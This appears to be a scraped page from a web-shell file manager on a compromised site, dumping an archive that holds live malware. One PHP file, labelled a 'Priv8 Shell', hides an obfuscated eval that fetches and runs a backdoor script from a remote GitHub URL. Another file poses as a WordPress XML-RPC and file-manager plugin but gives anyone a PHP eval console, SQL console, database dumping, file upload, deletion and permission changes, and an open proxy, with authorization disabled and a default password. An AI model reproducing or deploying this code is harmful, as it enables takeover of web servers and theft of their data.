whoami7 - Manager
:
/
home
/
logoandw
/
rabactech.com
/
Upload File:
files >> /home/logoandw/rabactech.com/cur.zip
PK ��Y]��wi i moon.phpnu �[��� <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <!-- GIF89;a --> <!-- GIF89;a --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Sid Gifari Priv8 Shell</title> </head> <body> <?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://raw.githubusercontent.com/rapeatworld/bekd0r/main/indoxploit.php"));/**/?> </body> </html>PK ��Y.f6M? M? admin.phpnu �[��� <?php /** * XML-RPC protocol support for WordPress * * @package WordPress */ /** * Whether this is an XML-RPC Request. * * @var bool */ /** Plugin Name: WP File Manager Plugin URI: https://wordpress.org/plugins/wp-file-manager Description: Manage your WP files. Author: mndpsingh287 Version: 8.0 Author URI: https://profiles.wordpress.org/mndpsingh287 License: GPLv2 **/ // Configuration — do not change manually! $authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}'; $php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}'; $sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}'; $translation = '{"id":"en","Add":"Add","Are you sure you want to delete this directory (recursively)?":"Are you sure you want to delete this directory (recursively)?","Are you sure you want to delete this file?":"Are you sure you want to delete this file?","Archiving":"Archiving","Authorization":"Authorization","Back":"Back","Cancel":"Cancel","Chinese":"Chinese","Compress":"Compress","Console":"Console","Cookie":"Cookie","Created":"Created","Date":"Date","Days":"Days","Decompress":"Decompress","Delete":"Delete","Deleted":"Deleted","Download":"Download","done":"done","Edit":"Edit","Enter":"Enter","English":"English","Error occurred":"Error occurred","File manager":"File manager","File selected":"File selected","File updated":"File updated","Filename":"Filename","Files uploaded":"Files uploaded","French":"French","Generation time":"Generation time","German":"German","Home":"Home","Quit":"Quit","Language":"Language","Login":"Login","Manage":"Manage","Make directory":"Make directory","Name":"Name","New":"New","New file":"New file","no files":"no files","Password":"Password","pictures":"pictures","Recursively":"Recursively","Rename":"Rename","Reset":"Reset","Reset settings":"Reset settings","Restore file time after editing":"Restore file time after editing","Result":"Result","Rights":"Rights","Russian":"Russian","Save":"Save","Select":"Select","Select the file":"Select the file","Settings":"Settings","Show":"Show","Show size of the folder":"Show size of the folder","Size":"Size","Spanish":"Spanish","Submit":"Submit","Task":"Task","templates":"templates","Ukrainian":"Ukrainian","Upload":"Upload","Value":"Value","Hello":"Hello","Found in files":"Found in files","Search":"Search","Recursive search":"Recursive search","Mask":"Mask"}'; // end configuration // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg = ''; // service string $default_language = 'ru'; $detect_lang = true; $fm_version = 1.4; //Authorization $auth = json_decode($authorization,true); $auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; $auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30; $auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin'; $auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm'; $auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user'; $auth['script'] = isset($auth['script']) ? $auth['script'] : ''; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg=="); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? ' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ //как-то тоже подменять надо } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' <tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } function find_text_in_files($dir, $mask, $text) { $results = array(); if ($handle = opendir($dir)) { while (false !== ($entry = readdir($handle))) { if ($entry != "." && $entry != "..") { $path = $dir . "/" . $entry; if (is_dir($path)) { $results = array_merge($results, find_text_in_files($path, $mask, $text)); } else { if (fnmatch($mask, $entry)) { $contents = file_get_contents($path); if (strpos($contents, $text) !== false) { $results[] = str_replace('//', '/', $path); } } } } } closedir($handle); } return $results; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>'.__('File manager').'</title> </head> <body> <form action="" method="post"> '.__('Login').' <input name="login" type="text"> '.__('Password').' <input name="password" type="password"> <input type="submit" value="'.__('Enter').'" class="fm_input"> </form> '.fm_lang_form($language).' </body> </html> '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = ' <div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);"> <form action="" method="GET"> <input type="hidden" name="proxy" value="true"> '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55"> <input type="submit" value="'.__('Show').'" class="fm_input"> </form> </div> '; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result); echo $result; die(); } } ?> <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title><?=__('File manager')?></title> <style> body { background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; margin: 0px; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } a.th:link { color: #FFA34F; text-decoration: none; } a.th:active { color: #FFA34F; text-decoration: none; } a.th:visited { color: #FFA34F; text-decoration: none; } a.th:hover { color: #FFA34F; text-decoration: underline; } table.bg { background-color: #ACBBC6 } th, td { font: normal 8pt Verdana, Arial, Helvetica, sans-serif; padding: 3px; } th { height: 25px; background-color: #006699; color: #FFA34F; font-weight: bold; font-size: 11px; } .row1 { background-color: #EFEFEF; } .row2 { background-color: #DEE3E7; } .row3 { background-color: #D1D7DC; padding: 5px; } tr.row1:hover { background-color: #F3FCFC; } tr.row2:hover { background-color: #F0F6F6; } .whole { width: 100%; } .all tbody td:first-child{width:100%;} textarea { font: 9pt 'Courier New', courier; line-height: 125%; padding: 5px; } .textarea_input { height: 1em; } .textarea_input:focus { height: auto; } input[type=submit]{ background: #FCFCFC none !important; cursor: pointer; } .folder { background-image: 